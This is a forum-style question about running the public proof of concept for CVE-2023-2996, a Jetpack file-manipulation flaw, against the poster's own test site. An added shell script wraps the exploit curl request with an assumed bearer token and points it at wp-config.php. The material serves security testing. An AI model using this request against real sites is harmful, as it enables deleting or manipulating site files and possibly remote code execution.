I am running the proof of concept (POC) on a test site for the vulnerability CVE-2023-2996, Jetpack < 12.1.1 – Author+ Arbitrary File Manipulation via API.
This is what the WPScan report says, if you want to read and understand the vulnerability: WPScan Report
Description:
The plugin does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieving Remote Code Execution via Phar deserialization.
Proof of Concept:
curl --json '{ "media": {"tmp_name": "/WP_CONTENT_PATH/wp-config.php", "name": "test.txt"} }' https://public-api.wordpress.com/rest/v1.2/sites/BLOG_ID/media/1/edit
Where BLOG_ID is the site’s Jetpack blog ID.
For this proof of concept, I have a test site on Azure App Service, with Jetpack connected in a vulnerable version, and I have my blog_id. Additionally, I have my site on a custom domain so that my Jetpack site is not in staging mode. If the site is in staging mode, API calls are disabled. I have also created a user to whom I assigned author permissions to perform the POC. However, what I don't understand is how to execute the POC. When I open the terminal and directly run that POC with my blog_id, I receive the message:
{"error":"unauthorized","message":"This endpoint does not allow unauthorized access."}
But I believe I am doing something wrong, because I assume I should put some token in the curl command to be recognized as an author, as so far I am just opening the terminal and running the POC directly. I would greatly appreciate it if someone could explain how to solve this problem.
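The request from the WPScan PoC, wrapped in a small script so the response can be checked rather than eyeballed. This is an added example, not code from the post, from WPScan or from Jetpack. It assumes that the WordPress.com public API accepts an OAuth2 access token in an "Authorization: Bearer <token>" header (the header is the assumption here; how the Author account obtains that token is not covered on this page), and that BLOG_ID and WPCOM_TOKEN are provided as environment variables. The path "/WP_CONTENT_PATH/wp-config.php" is the placeholder from the PoC, left as-is.

```shell
#!/bin/sh
# Added example: CVE-2023-2996 PoC request sent with an Authorization header.
# ASSUMPTION: the endpoint accepts "Authorization: Bearer <token>"; obtaining
# the token for the Author account is outside this script.
# Requires curl >= 7.82 for --json.

# Build the JSON body from the PoC. tmp_name is the server-side path the
# plugin will treat as an uploaded temp file, name is the target filename.
build_payload() {
  tmp_name="$1"
  name="$2"
  printf '{ "media": {"tmp_name": "%s", "name": "%s"} }' "$tmp_name" "$name"
}

# Classify the JSON body the endpoint returns, so a script can tell
# "no usable credentials were sent" apart from every other outcome.
classify_response() {
  body="$1"
  case "$body" in
    *'"error":"unauthorized"'*) echo "unauthorized" ;;   # the message from the post
    *'"error":'*)               echo "other_error" ;;    # some other API error
    *)                          echo "no_error_field" ;; # no "error" key at all
  esac
}

# Send the PoC request with the (assumed) bearer header.
send_poc() {
  blog_id="$1"; token="$2"; tmp_name="$3"; name="$4"
  curl -sS \
    -H "Authorization: Bearer $token" \
    --json "$(build_payload "$tmp_name" "$name")" \
    "https://public-api.wordpress.com/rest/v1.2/sites/$blog_id/media/1/edit"
}

# Usage: only runs when both variables are set, so the file is safe to source.
if [ -n "${BLOG_ID:-}" ] && [ -n "${WPCOM_TOKEN:-}" ]; then
  resp="$(send_poc "$BLOG_ID" "$WPCOM_TOKEN" "/WP_CONTENT_PATH/wp-config.php" "test.txt")"
  printf '%s\n' "$resp"
  echo "result: $(classify_response "$resp")"
fi
```

Run as `BLOG_ID=123456 WPCOM_TOKEN=... sh poc.sh` against your own test site only. If the response still classifies as "unauthorized" with a token present, the token is not being accepted for that site or user, which is a different problem from sending no credentials at all.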